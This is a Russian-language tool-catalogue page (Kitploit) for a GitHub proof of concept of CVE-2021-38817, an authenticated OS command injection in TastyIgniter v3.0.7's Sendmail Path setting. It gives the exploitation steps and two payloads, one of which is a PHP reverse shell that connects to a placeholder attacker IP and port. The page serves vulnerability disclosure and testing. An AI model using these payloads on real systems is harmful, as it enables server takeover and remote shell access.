Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-38817-Remote-OS-Command-Injection — Удаленное внедрение команд ОС в TastyIgniter v3.0.7 в поле Sendmail Path | Kitploit
Инструменты/GitHubGitHub/huskyhacks/cve-2021-38817-remote-os-command-injection
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеРазработка Полезной Нагрузки
GitHubhuskyhacks/cve-2021-38817-remote-os-command-injection

CVE-2021-38817-Remote-OS-Command-Injection

Удаленное внедрение команд ОС в TastyIgniter v3.0.7 в поле Sendmail Path

Репозиторий
92503 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-38817-Remote-OS-Command-Injection

Аутентифицированная удалённая инъекция команд ОС / удалённое выполнение кода в веб-части Sendmail TastyIgniter v3.0.7 (CVE-2021-38817)

Уязвимость аутентифицированной удалённой инъекции команд ОС существует в меню конфигурации Sendmail веб-приложения TastyIgniter v3.0.7 (CMS для ресторанов). Параметр Sendmail Path не обрабатывается должным образом, о чём свидетельствует команда /usr/sbin/sendmail -bs, подставляемая в поле; это позволяет внедрить произвольную команду, добавив точку с запятой и дополнительную команду ОС.

Затронутые компоненты

URL: /admin/settings/edit/mail

Поле:

  • Почтовый протокол: Sendmail
  • Поле: Sendmail Path

POC

  • Выполните аутентификацию на портале /admin с помощью учётных данных.
  • Перейдите к /admin/settings/edit/mail
  • В раскрывающемся меню Mail Protocol выберите Sendmail
  • В новом поле SendMail Path добавьте точку с запятой и произвольную команду ОС, например: /usr/sbin/sendmail -bs; sleep 10

Полезные нагрузки

  • /usr/sbin/sendmail -bs; sleep 10
  • /usr/sbin/sendmail -bs; php -r '$sock=fsockopen("[IP]",[PORT]);exec("/bin/sh -i <&3 >&3 2>&3");'

TastyIgniterCVE

Обнаружено

Мэтт Кили (HuskyHacks) и Майк Падрик (Fearless), август 2021 г.

CVE присвоен в октябре 2022 г. (лол)

Скачать инструмент